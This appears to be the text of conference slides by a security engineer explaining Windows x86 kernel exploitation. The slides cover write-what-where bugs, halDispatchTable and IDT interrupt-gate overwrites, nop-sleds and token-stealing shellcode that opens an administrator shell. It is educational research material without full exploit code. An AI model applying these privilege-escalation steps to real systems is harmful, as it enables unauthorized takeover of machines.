2. About me
• inaz2
• Security engineer & Python programmer
• Working at NTT Communications
• Weblog “momoiro technology”
• http://inaz2.hatenablog.com/
2
3. Windows kernel exploitation
• Attacks that exploit the vulnerability in the kernel land
• Including the vulnerability in device drivers
• Write-what-where condition/vulnerability is widely used
• Enables to write an arbitrary value to the arbitrary address
• Execute the shellcode to escalate privilege of the attacking process
• Then launch the administrator command prompt
3
4. Classic technique: halDispatchTable overwrite
• nt!NtQueryIntervalProfile internal API
• call [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile
• Overwrite [nt!halDispatchTable+4] to shellcode
4
5. Replace token shellcode
• Copy the token object from System process (PID=4)
5
Replace 41414141h to
the attacking process’ PID
6. It works but …
• Depending on the implementation of nt!NtQueryIntervalProfile
• Kernel implementation may be changed in the future (i.e. not reliable)
• Is there the more reliable target to overwrite?
6
7. It works but …
• Depending on the implementation of nt!NtQueryIntervalProfile
• Kernel implementation may be changed in the future (i.e. not reliable)
• Is there the more reliable target to overwrite?
7
8. x86 interrupt handling
• There are hardware interrupts (keyboard etc.) and software
interrupts (zero division etc.)
• Software interrupts are triggered by “int n” instruction
• Interrupt Descriptor Table (IDT)
• Stores the addresses of hander functions (Interrupt Software Routines; ISR)
in each entry (interrupt gate)
• ISRs are executed in Ring 0
• Can do everything
8
9. x86 privilege levels (protection rings)
• 4 privilege levels numbered from 0 to 3
• The greater number means lesser privileges
• Most OS including Windows use only two rings
• Ring 0 corresponding to kernel mode and Ring 3 to user mode
9
13. Interrupt Descriptor Table (4/4)
• Overwrite the interrupt gate for interrupt #0
13
414184fc
000884fc 4141ee00
DPL=3
14. IDT overwrite technique
14
Get the IDT address
Overwrite the interrupt gate for interrupt #n
Trigger interrupt #n by “int n” instruction
Execute shellcode
16. Find the write-what-where vulnerability
• Write and install the vulnerable device driver
• Enables to attack write-what-where vulnerability via IOCTL
17
17. Get the IDT address (1/2)
18
Can be used even in Ring 3!
18. Get the IDT address (2/2)
• The function that returns the IDT address
19
Disable alignment
19. Write the Interrupt Software Routine (ISR)
• Switch the value of fs segment register
• 0x33 (TEB) → 0x30 (KPCR)
• Call the shellcode right after ISR
• Return by iretd instruction instead of ret
20
20. Allocate memory & put the codes
• Allocate nop-sled from 0x41410000 to 0x41420000
• Put the ISR code + shellcode from 0x41420000
21
21. Overwrite the interrupt gate
• Write 0x4141ee00 to the latter half of the interrupt gate for interrupt
#32
• #32-255 are designated as user-defined interrupts (not reserved)
22
22. Trigger the software interrupt
• Execute “int 32”
• Shellcode is executed via ISR
• Then launch cmd.exe
23
24. What about 64 bit Windows?
• The size of interrupt gate increases to 16 bytes
• As 0x100000000 bytes nop-sled is quite hard, overwriting entire
interrupt gate is required (i.e. write 2 times)
• However, my VirtualBox VM hangs up when the interrupt is triggered
(PatchGuard??)
25
25. Comparison with halDispatchTable overwrite
• Pros
• Reliable against all versions of x86-based Windows
• Easy to determine the address to be overwritten
• Cons
• Need to prepare the ISR code
• Need to allocate nop-sled
• Not confirmed on 64 bit
26
26. Recap
• IDT overwrite technique is reliable against all versions of x86-based
Windows
• Independent with kernel implementation changes
• We can get the IDT address even in Ring 3
• There’s more than one way to do it
27
27. References
• Windowsでデバイスドライバの脆弱性からの権限昇格をやってみる - もも
いろテクノロジー
• http://inaz2.hatenablog.com/entry/2015/09/15/121926
• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit
sandbox escape exploitation
• http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-
them-all_21.html
• Interrupt Service Routines - OSDev Wiki
• http://wiki.osdev.org/Interrupt_Service_Routines
• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions
(SIDT, SGDT) on x86 - WHY ?
• http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html
28